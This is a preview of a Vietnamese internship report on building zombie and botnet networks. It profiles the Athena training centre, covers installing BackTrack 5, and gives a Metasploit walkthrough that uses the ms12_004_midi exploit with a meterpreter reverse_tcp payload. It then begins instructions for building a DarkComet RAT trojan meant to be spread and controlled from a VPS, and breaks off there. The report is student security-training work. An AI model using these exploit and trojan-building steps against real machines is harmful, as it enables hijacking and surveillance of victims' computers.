Tải bản đầy đủ (.pdf) (32 trang)

BÁO cáo THỰC tập đề tài nghiên cứu và triển khai mạng lưới zombie , botnet trên hệ thống mạng

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.48 MB, 32 trang )

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ
ATHENA




BÁO CÁO THỰC TẬP



ĐỀ TÀI:
Nghiên cứu và triển khai mạng lưới
zombie , botnet trên hệ thống mạng


GVHD : Võ Đỗ Thắng
SVTT: Hồ Quốc Nghị



Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
2
Trang
LỜI CẢM ƠN
  
Trước hết em xin chân thành cảm ơn tất cả các thầy cô tại Trung Tâm Đào
Tạo Athena đã tận tình hướng dẫn em trong quá trình thực tập tại Trung Tâm Đào
Tạo Athena .Bên cạnh đó nhờ có sự giúp đỡ của thầy cô và các bạn cùng

khóa, đến


nay em đã hoàn thành xong đề tài: “Nghiên cứu và triển khai mạng lưới zoombie ,
botnet trên hệ thống mạng”.
Để có được kết quả này, em xin chân thành cám ơn Thầy Võ Đỗ Thắng đã
quan tâm hướng dẫn cho em trong suốt quá trình hoàn thành đề tài này.
Vì thời gian có hạn cũng như kinh nghiệm còn thiếu nên đề tài của em không
tránh khỏi những thiếu sót. Em rất mong nhận được sự chỉ bảo, đóng góp ý kiến
của thầy để em có điều kiện bổ sung và có thể hoàn thành tốt đề tài của mình hơn.

Sinh viên thực tập
Hồ Quốc Nghị




Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
3
Trang
NHẬN XÉT TRUNG TÂM ATHENA
  












TP.HCM, ngày …. tháng …. năm 2014
Giáo viên hướng dẫn


Võ Đỗ Thắng


Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
4
Trang
MỤC LỤC

I.

LỜI MỞ ĐẦU 6

1.

Sự cần thiết của đề tài 6

2.

Mục tiêu nghiên cứu 6

3.

Phương pháp nghiên cứu 6

II.


GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA 7

1.

Sơ lược trung tâm 7

2.

Trụ sở và các chi nhánh và thông tin liên hệ 7

a.

Trụ sở chính 7

b.

Cơ sở tại HCM 8

c.

Thông tin liên hệ 8

3.

Quá trình hình thành và phát triển 8

4. Cơ cấu tổ chức 9
5.

Các khóa học của trung tâm Athena 10


a.

Các khóa học dài hạn 10

b.

Các khóa học ngắn hạn 10

c.

Các sản phẩm khác 11

d.

Cơ sở hạ tầng 11

e.

Các dịch vụ hỗ trợ 11

6.

Khách hàng của Athena 11

7.

Đối tác của Athena 12

8.


Đội ngũ giảng viên của trung tâm đào tạo Athena 12

III.

GIỚI THIỆU VỀ BACKTRACK 5 13

1.

Giới thiệu 13

2.

Mục đích 13

3.

Cài đặt 14

a.

Cài đặt trong máy thật 14

b.

Cài đặt trong máy ảo 14

IV.

TRIỂN KHAI TRONG MÔI TRƯỜNG LAN 21


1.

Triển khai trong môi trường LAN 21

2.

Thử nghiệm xâm nhập bằng Metasploit 22

V.

XÂY DỰNG BONET BẰNG DARKCOMET 24

3.

Giới thiệu DarkComet 24

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
5
Trang
4.

Cài đặt DarkComet 24

VI.

HƯỚNG PHÁT TRIỂN 31

VII.


KẾT LUẬN 31

VIII.

TÀI LIỆU THAM KHẢO 32





Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
6
Trang
I. LỜI MỞ ĐẦU
1. Sự cần thiết của đề tài
Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed Denial
of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất.
DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ
thống nhằm chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận
và phục vụ các yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7
năm 2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi
Trẻ Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập
được trong nhiều tuần lễ liên tiếp. Theo thống kê từ Abort Network, đầu năm 2014
có hơn 100 vụ tấn công DDoS trên 100Gbps, 5733 vụ tấn công đạt 20Gbps gấp
hơn hai lần năm 2013.
Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các
hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến
hàng triệu máy. Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet
sẽ giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng
ngừa sự phát triển của hệ thống zombie, botnet.

2. Mục tiêu nghiên cứu
Đề tài nghiên cứu trên hai môi trường:
Giai đoạn 1:
Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các máy trong
mạng, thử xâm nhập trên các máy.
Giai đoạn 2:
Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu khiển
mạng lưới botnet thông qua mạng Internet.
3. Phương pháp nghiên cứu
Giai đoạn 1:
Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt Backtrack
trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới một
mục tiêu.
Giai đoạn 2:
Cài đặt và tạo bot bằng DarkComet trên VPS (Virtual Private Server) và phát tán
trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public
của VPS.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
7
Trang
II. GIỚI THIỆU TỔNG QUAN VỀ TRUNG TÂM ĐÀO TẠO ATHENA
1. Sơ lược trung tâm
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA_Tiền
thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương
hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo
giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Đầu Tư Tp Hồ Chí Minh
cấp ngày 04 tháng 11 năm 2008.
Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED.

ATHENA là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt
huyết và kinh nghiệm trong lĩnh vực công nghệ thông tin. Với quyết tâm góp phần
vào công cuộc thúc đẩy tiến trình tin học hóa của nước nhà. ATHENA đã và đang
tập trung chủ yếu vào các họat động sau:
Đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các
tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI,
CEH, Song song đó, trung tâm ATHENA còn có những chương trình đào tạo
cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ
Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài
chính Qua đó cung cấp nguồn nhân lực trong lĩnh vực công nghệ thông tin, đặc
biệt là chuyên gia về mạng máy tính và bảo mật mạng đạt trình độ quốc tế cho các
tổ chức, doanh nghiệp có nhu cầu.
Tư vấn và hổ trợ cho doanh nghiệp ứng dụng hiệu quả tin học vào hoạt động sản
xuất kinh doanh.
Tiến hành các hoạt động nghiên cứu nâng cao kiến thức tin học và phát triển cơ
sở dữ liệu thông tin về các ứng dụng và sự cố mạng.
Tiến hành các dịch vụ ứng cứu khẩn cấp cho doanh nghiệp trong trường hợp xảy
ra sự cố máy tính.
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là
chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều
bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở
Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
Ngoài ra, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công
nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí Minh, Học
Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an
toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự
2. Trụ sở và các chi nhánh và thông tin liên hệ
a. Trụ sở chính
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA.
Số 2 Bis Đinh Tiên Hoàng, Phường Đa Kao, Tp Hồ Chí Minh, Việt Nam.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
8
Trang
b. Cơ sở tại HCM
Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế ATHENA
92 Nguyễn Đình Chiểu ,Phường Đa Kao,Quận 1, Tp Hồ Chí Minh, Việt Nam
c. Thông tin liên hệ
Điện thoại: ( 84-8 ) 3824 4041
Điện thoại: ( 84-8 ) 2210 3801
Hotline: 0943 23 00 99
Website: www.Athena.Edu.Vn
3. Quá trình hình thành và phát triển
Một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh
vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền
công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao
và có đầu óc lãnh đạo cùng với tầm nhìn xa về tương lai của ngành công nghệ
thông tin trong tương lai, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ
thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá
nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ
công nghệ thông tin cho đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:
- Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính Athena,
hiện tại là giám đốc dự án của công ty Siemen Telecom.
- Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty
EIS, Phó Tổng công ty FPT.
- Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu trách
nhiệm công nghệ thông tin của Ngân hàng.
- Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và an
ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy tính
gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính
miền Nam.
Từ năm 2004- 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung
tâm trở thành một trong những địa chỉ tin cậy của nhiều doanh nghiệp nhằm cài
đặt hệ thống an ninh mạng và đào tạo cho đội ngũ nhân viên của các doanh nghiệp
về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử,
bảo mật web… và là địa chỉ tin cậy của nhiều học sinh_sinh viên đến đăng kí học.
Đòi hỏi cấp thiết trong thời gian này của Trung tâm là nâng cao hơn nữa đội ngũ
giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ
thông tin của đất nước nói chung, các doanh nghiệp, cá nhân nói riêng.Năm 2004,
công ty mở rộng hoạt động cung cấp giải pháp, dịch vụ cho khu vực miền Trung
thông qua việc thành lập văn phòng đại diện tại Đà Nẵng.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
9
Trang

Đến năm 2006: Trung tâm đào tạo quản trị và an ninh mạng Athena mở ra thêm
một chi nhánh tại Cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ
giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và
học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thời gian này
Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ
thông tin lành nghề từ các doanh nghiệp, tổ chức, làm giàu thêm đội ngũ giảng
viên của trung tâm.
Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc
lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm rơi vào
nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn Thế Phúc rút vốn khỏi
công ty gây nên sự hoang man cho toàn bộ hệ thống trung tâm. Cộng thêm chi
nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động không còn hiệu quả phải đóng cửa
làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này, với quyết tâm

khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học
hóa của đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm
giám đốc và xây dựng lại trung tâm. Đây là một bước chuyển mình có ý nghĩa
chiến lược của trung tâm. Mở ra một làn gió mới và một giai đoạn mới, cùng với
quyết tâm mạnh mẽ và một tinh thần thép đã giúp ông Thắng vượt qua nhiều khó
khăn ban đầu, giúp trung tâm đứng vững trong thời kì khủng hoảng.
Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược. Trung
tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại quỹ đạo hoạt
động của mình. Đến nay, Trung tâm đã trở thành một trong những trung tâm đào
tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết của rất nhiều công ty,
tổ chức doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn nhân
lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào
tiến trình tin học hóa nước nhà.
4. Cơ cấu tổ chức
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
10
Trang

5. Các khóa học của trung tâm Athena
a. Các khóa học dài hạn
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician
- Chương trình đào tạo chuyên gia an ninh mạng. ( AN2S) Athena network
security specialist.
- Chương trình Quản trị viên an ninh mạng (ANST) Athena netuwork security
Technician.
- Chuyên viên quản trị mạng nâng cao (ANMA) Athena network manager
Administrator

b. Các khóa học ngắn hạn
- Quản trị mạng Microsoft căn bản ACBN .
- Phần cứng máy tính, laptop, server .
- Quản trị hệ thống mạng Microsoft MCSA Security.
- Quản trị mạng Microsoft nâng cao MCSE.
- Quản trị window Vista
- Quản trị hệ thống Window Server 2008, 2012.
- Lớp Master Exchange Mail Server.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
11
Trang
- Quản trị mạng quốc tế Cissco CCNA.
- Quản trị hệ thống mạng Linux 1 và Linux 2.
- Khóa thiết kế web và bảo mật mạng
- Xây dựng, quản trị web thương mại điện tử với Joomla và VirtuMart.
- Lập trình web với Php và MySQL.
- Bảo mật mạng quốc tế ACNS.
- Hacker mũ trắng .
- Athena Mastering Firewall Security.
- Bảo mật website.
c. Các sản phẩm khác
- Chuyên đề thực hành sao lưu và phục hồi dữ liệu.
- Chuyên đề thực hành bảo mật mạng Wi_Fi.
- Chuyên đề Ghost qua mạng.
- Chuyên đề xây dựng và quản trị diễn đàn.
- Chuyên đề bảo mật dữ liệu phòng chống nội gián.
- Chuyên đề quản lý tài sản công nghệ thông tin .
- Chuyên đề kỹ năng thương mại điện tử.
d. Cơ sở hạ tầng

- Thiết bị đầy đủ và hiện đại.
- Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
- Phòng máy rộng rãi, thoáng mát.
e.
Các dịch vụ hỗ trợ

- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
- Giới thiệu việc làm cho mọi học viên.
- Thực tập có lương cho học viên khá giỏi.
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng.
- Hỗ trợ thi Chứng chỉ Quốc tế.
6. Khách hàng của Athena
Mọi đối tượng chuyên hoặc không chuyên về CNTT.
Khách hàng chủ yếu của ATHENA là các bạn học sinh, sinh viên và các cán bộ
công nhân viên chức yêu thích lĩnh vực công nghệ thông tin.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
12
Trang
7. Đối tác của Athena
Trung tâm đào tạo an ninh mạng ATHENA là đối tác đào tạo & cung cấp nhân sự
CNTT, quản trị mạng , an ninh mạng chất lượng cao theo đơn đặt hàng cho các
đơn vị như ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính…
8. Đội ngũ giảng viên của trung tâm đào tạo Athena
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học
hàng đầu trong nước Tất cả giảng viên ATHENA đều phải có các chứng chỉ

quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm
Quốc tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc
để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA.
Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức
công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore, và
truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm
ATHENA.

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
13
Trang
III. GIỚI THIỆU VỀ BACKTRACK 5
1. Giới thiệu
Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y
kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn
gốc từ sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào
thử nghiệm thâm nhập: WHAX và Auditor Security Collection
2. Mục đích
Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập.
Các công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau:
Information gathering: loại này có chứa một số công cụ có thể được sử dụng để
có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang
web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên
internet,mà không cần chạm vào môi trường mục tiêu.
Network mapping: loại này chứa một số công cụ có thể được sử dụng để có kiểm
tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và
cũng làm portscanning.
Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công
cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các
công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple

Network Management Protocol (SNMP).
Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần
số vô tuyến (RFID).
Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy
tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc
quyền của chúng ta cho các đặc quyền cao nhất.
Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy
trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy
trì quyền truy cập.
Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
14
Trang
Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp
trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn
khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin
trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ
rối chương trình một hoặc tháo rời một tập tin thực thi.
3. Cài đặt
Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack-
linux.org/downloads/, có bản cho Vmware và file ISO.

a. Cài đặt trong máy thật
Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy Backtrack
Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là toor. Sau
đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack
5.
Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop
và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử
dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity. Sau đó
cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số câu hỏi như thành phố chúng ta đang
sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt
b. Cài đặt trong máy ảo
Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử dụng
đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được wireless
trừ USB wireless.
Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây
chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong
file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng được
card mạng thật, ta phải chọn Netword là Briged
Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare:
Vmware Workstation 9
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
15
Trang

Tạo một máy ảo mới và cho đĩa BackTrack vào

Giao diện khởi động của BackTrack
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
16
Trang


Gõ startx để vào chế độ đồ họa trong BackTrack

Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
17
Trang

Chọn ngôn ngữ, chọn Tiếp để tiếp tục

Chọn múi giờ, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
18
Trang

Chọn ngôn ngữ bàn phím, chọn Tiếp để tiếp tục

Chọn phân vùng để cài, chọn Tiếp để tiếp tục
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
19
Trang

Nhấn Cài đặt để bắt đầu cài

Quá trình cài đã bắt đầu.
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
20
Trang

Sau khi hoàn tất, chỉ việc khởi động lại là xong.



Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
21
Trang
IV. TRIỂN KHAI TRONG MÔI TRƯỜNG LAN
1. Triển khai trong môi trường LAN
VMware Workstation chuẩn bị sẵn cho chúng ta 10 Switch ảo. Trong số đó,
VMnet0, VMnet1 và VMnet8 được dùng để kết nối với một vài thiết bị đặc biệt
khác như Virtual Bridge, Virtual NAT Device, DHCP Server. Trong khuôn khổ bài
này, ta sẽ sử dụng VMnet0 để thiết lập mạng cho các máy ảo trong VMware.

VMnet0 là một Switch ảo được kết nối với Bridge ảo để liên lạc ra ngoài mạng
thật. Các máy tính ảo nếu được cấu hình card mạng kết nối vào VMnet0 thì có thể
tham gia vào việc liên lạc, chia sẻ dữ liệu với các máy thật ở mạng ngoài. Nếu
mạng ngoài chúng ta có kết nối với Router ADSL, có cấu hình cấp IP động trên
Router thì các máy ảo sẽ nhận được IP từ Router như một máy tính thật. Mặc
định, VMWare sẽ tự chọn card mạng trên máy thật mà có kết nối ra mạng ngoài.
Tuy nhiên nếu máy các bạn có nhiều hơn 2 card mạng thật thì chúng ta có thể lựa
chọn lại cho phù hợp bằng cách điều chỉnh trong Virtual Network Editor > tab Host
Virtual Network Mapping> VMnet0.

Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích
chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network
Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged.

Làm tương tự với các máy ảo khác.
Như vậy, sau khi cấu hình xong, các máy ảo được cấp địa chỉ IP như máy thật.
Và do đó, các máy ảo thuộc về cùng một mạng LAN, và chung mạng LAN với cả
máy thật đang chạy VMware.



Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
22
Trang
Mô hình mạng LAN được mô phỏng:






2. Thử nghiệm xâm nhập bằng Metasploit
Trong Backtrack, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập.
Công cụ này có database rất lớn, về các lỗi tồn tại trên các hệ điều hành và cách
tấn công.
Để khởi động giao diện Console của Metasploit, trong Terminal, gõ msfconsole.
Giao diện chương trình:

Khi dấu nhắc trở thành msf> , chúng ta có thể sử dụng chương trình.
Để sử dụng một module nào đó, chúng ta sử dụng cú pháp:
use <Đường dẫn đến module>
VD: khai thác lỗi ms12_004
use exploit/windows/browser/ms12_004_midi -> Enter
Các thiết lập:
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.0.126
set LHOST 192.168.0.126
exploit
Switch

PC1 PC2
PC3
Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
23
Trang
Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc
(http://192.168.0.126:8080/OXRIFK6vPY), chỉ cần nạn nhân click vào link thì mã
độc sẽ được gửi sang máy nạn nhân và sau đó có thể chiếm quyền máy.




Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
24
Trang
V. XÂY DỰNG BONET BẰNG DARKCOMET
3. Giới thiệu DarkComet
DarkComet là một công cụ quản trị từ xa (Remote Administrator Tool) miễn phí rất
nổi tiếng, được tạo ra để điều khiển bất kì máy Microsoft Windows nào. DarkComet
có khả năng điều khiển truy cập từ xa, quả lí tập tin, giám sát (keyloger, chụp ảnh
màn hình, xem webcame, ), các chức năng mạng,
Dự án DarkComet RAT đã phát hành bản chính thức cuối cùng là DarkComet RAT
v5.4.1 Legacy vào ngày 1/10/2012.
4. Cài đặt DarkComet
Dự án DarkComet RAT đã chính thức đóng vào tháng 6 năm 2012, các bản chính
thức trên trang đã được gỡ xuống. Bản DarkComet
dùng trong phần này là bản DarkComet Rat 5.3.1, được download từ

Chạy DarkComet trên linux:
Tải bản DarkComet về, giải nén vào thư mục darkcomet5.3.1RAT. Mở terminal,

chuyển thư mục làm việc hiện hành về darkcomet5.3.1RAT. Dùng lệnh wine
darkcomet để khởi động DarkComet:
wine darkcomet

Giao diện quản lí của DarkComet:

Trung tâm đào tạo Quản trị và An ninh mạng ATHENA – Báo cáo thực tập
25
Trang
Tạo cổng lắng nghe các kết nối từ nạn nhân: Vào DarkComet-RAT -> Listen to
new port(+Listen)


Điền cổng kết nối, cổng mặc định là 1604. Chọn Listen để xác nhận



Ta có thể thêm cổng lắng nghe khác nếu muốn.
Tạo trojan:
Trojan có thể được tạo từ bất kì máy windows nào. Các bước tạo trojan:
Download DarkComet
Giải nén file DarkComet531RAT.zip vào thư mục DarkComet.
Vào thư mục DarkComet, chạy file DarkComet.exe
Vào DarkComet -> Server module:
Chọn Minimalist nếu muốn dùng các tùy chọn mặc định
Chọn Full Editor nếu muốn tùy chỉnh tất cả tùy chọn.

×